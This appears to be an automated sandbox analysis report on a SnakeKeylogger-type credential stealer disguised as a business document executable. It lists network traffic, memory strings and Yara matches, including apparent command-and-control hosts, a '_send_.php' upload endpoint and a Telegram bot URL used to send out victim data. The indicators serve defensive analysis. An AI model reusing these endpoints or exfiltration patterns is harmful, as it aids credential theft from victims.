Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 29 Aug 2024 10:16:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 29 Aug 2024 10:16:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 0000000C.00000002.1319580024.000000000328E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enp
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000333C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/p
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_00B0E314 0_2_00B0E314
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_0671F730 0_2_0671F730
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_06719620 0_2_06719620
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_0671A458 0_2_0671A458
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_06717F78 0_2_06717F78
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_06717F68 0_2_06717F68
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_06719F48 0_2_06719F48
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 0_2_06717B40 0_2_06717B40
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010AC146 11_2_010AC146
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A5362 11_2_010A5362
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010AD278 11_2_010AD278
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010AC468 11_2_010AC468
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010AC738 11_2_010AC738
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010AE988 11_2_010AE988
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A69A0 11_2_010A69A0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010ACA08 11_2_010ACA08
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A9DE0 11_2_010A9DE0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010ACCD8 11_2_010ACCD8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010ACFA9 11_2_010ACFA9
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A6FC8 11_2_010A6FC8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A3E09 11_2_010A3E09
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010AF961 11_2_010AF961
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010AE97B 11_2_010AE97B
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A39EE 11_2_010A39EE
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A29EC 11_2_010A29EC
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A3AA1 11_2_010A3AA1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06921E80 11_2_06921E80
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692DE00 11_2_0692DE00
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_069217A0 11_2_069217A0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06929C18 11_2_06929C18
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692FC68 11_2_0692FC68
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06920B30 11_2_06920B30
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06929328 11_2_06929328
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06925028 11_2_06925028
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06922968 11_2_06922968
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692E6B0 11_2_0692E6B0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692E6A0 11_2_0692E6A0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06921E70 11_2_06921E70
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692178F 11_2_0692178F
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692EF51 11_2_0692EF51
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692EF60 11_2_0692EF60
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692CCA0 11_2_0692CCA0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692DDF1 11_2_0692DDF1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692DDFF 11_2_0692DDFF
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692D550 11_2_0692D550
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692D540 11_2_0692D540
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06929548 11_2_06929548
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692EAF8 11_2_0692EAF8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692E258 11_2_0692E258
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692E24A 11_2_0692E24A
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06928B91 11_2_06928B91
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692F3B8 11_2_0692F3B8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06928BA0 11_2_06928BA0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692EB08 11_2_0692EB08
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06920B20 11_2_06920B20
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692D0F8 11_2_0692D0F8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692D0E9 11_2_0692D0E9
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692F810 11_2_0692F810
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06925018 11_2_06925018
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692F802 11_2_0692F802
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06920006 11_2_06920006
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06920040 11_2_06920040
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692D999 11_2_0692D999
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_0692D9A8 11_2_0692D9A8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_0306E314 12_2_0306E314
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_0764E9D0 12_2_0764E9D0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_07649620 12_2_07649620
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_0764A458 12_2_0764A458
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_07647F68 12_2_07647F68
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_07647F78 12_2_07647F78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_07649F48 12_2_07649F48
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 12_2_07647B40 12_2_07647B40
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BC5C0 20_2_056BC5C0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BD599 20_2_056BD599
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056B77A0 20_2_056B77A0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056B5370 20_2_056B5370
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BD2C8 20_2_056BD2C8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BCD28 20_2_056BCD28
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BEC18 20_2_056BEC18
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056B7F18 20_2_056B7F18
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BCFF7 20_2_056BCFF7
